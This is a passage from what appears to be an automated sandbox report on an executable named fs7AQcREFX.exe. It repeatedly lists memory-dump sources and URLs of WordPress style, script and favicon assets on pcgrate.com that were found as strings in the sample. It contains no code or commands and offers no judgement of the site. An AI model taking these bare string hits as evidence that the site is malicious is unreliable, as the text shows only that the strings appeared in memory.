00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1678274495
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1664959878
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=899328ee298e
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=899328ee298e
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=899328ee298e
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=899328ee298e
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
